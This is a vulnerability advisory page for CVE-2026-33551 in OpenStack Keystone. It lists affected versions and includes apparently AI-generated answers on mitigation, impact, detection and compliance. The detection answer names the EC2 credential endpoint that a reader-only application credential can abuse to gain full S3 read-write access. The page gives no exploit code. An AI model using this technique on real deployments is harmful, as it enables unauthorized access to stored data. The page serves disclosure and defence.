CVE-2026-33551
Privilege Escalation via EC2 Credential Creation in OpenStack Keystone
Publication date: 2026-04-10
Last updated on: 2026-04-10
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| openstack | keystone | From 14.0.0 (inc) to 26.1.1 (exc) |
| openstack | keystone | 27.0.0 |
| openstack | keystone | 28.0.0 |
| openstack | keystone | 29.0.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-863 | The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. |
Attack-Flow Graph
AI Powered Q&A
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation involves applying the patches provided for your OpenStack Keystone version that add the missing enforcement of application credential restrictions on the EC2 credential creation API endpoint.
Patches have been submitted for multiple OpenStack branches including 26.1.1, 27.0.1, 28.0.1, and 29.0.1.
If patching is not immediately possible, consider disabling or restricting the use of restricted application credentials in combination with the EC2/S3 compatibility API (swift3 / s3api) until a fix is applied.
Additionally, review and tighten policies around EC2 credential creation and deletion, as the deletion endpoint currently allows restricted credentials to delete EC2 credentials due to policy settings.
Can you explain this vulnerability to me?
CVE-2026-33551 is a vulnerability in OpenStack Keystone affecting versions 14 through 26 before 26.1.1, as well as versions 27.0.0, 28.0.0, and 29.0.0. The issue occurs because restricted application credentials, which are supposed to have limited permissions such as a reader role, can exploit the EC2 credential creation API to generate EC2/S3 credentials. These generated credentials inherit the full set of the parent user's S3 permissions, effectively bypassing the intended role restrictions.
This vulnerability specifically impacts deployments that use restricted application credentials in combination with the EC2/S3 compatibility API (swift3 / s3api). The root cause is that the EC2 credential creation endpoint does not properly enforce the restrictions on application credentials, allowing privilege escalation.
How can this vulnerability impact me? :
This vulnerability can allow an authenticated user with only a restricted, read-only application credential to escalate their privileges by creating EC2 credentials that grant full read-write access to the user's S3 buckets. This means that a user who should only have limited access can gain full access to object storage resources, potentially leading to unauthorized data access, modification, or deletion.
Such unauthorized access could compromise the confidentiality and integrity of stored data, leading to data breaches or loss. The impact is limited to environments that use restricted application credentials together with the EC2/S3 compatibility API.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection involves checking if restricted application credentials with only a reader role are able to create EC2 credentials, which should normally be disallowed.
A proof of concept involves attempting to create EC2 credentials using a restricted application credential and verifying if the creation succeeds despite the restricted role.
Specifically, you can test the EC2 credential creation API endpoint (`POST /v3/users/{user_id}/credentials/OS-EC2`) with a restricted application credential that has only reader permissions.
If the API allows creation of EC2 credentials with full S3 permissions, the vulnerability is present.
Commands to test this would involve using OpenStack CLI or direct API calls to attempt EC2 credential creation with restricted credentials and checking the response.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
This vulnerability allows an authenticated user with only a restricted application credential and a reader role to create EC2/S3 credentials that inherit the full set of the parent user's S3 permissions, effectively bypassing role restrictions. This escalation of privileges can lead to unauthorized access to sensitive data stored in S3-compatible storage.
Such unauthorized access and privilege escalation could potentially lead to violations of data protection regulations and standards like GDPR and HIPAA, which require strict access controls and protection of sensitive data. If an attacker exploits this vulnerability, it may result in unauthorized data exposure or modification, thereby impacting compliance with these regulations.
However, the vulnerability only affects deployments that use restricted application credentials in combination with the EC2/S3 compatibility API (swift3 / s3api), so the compliance impact depends on the specific deployment configuration.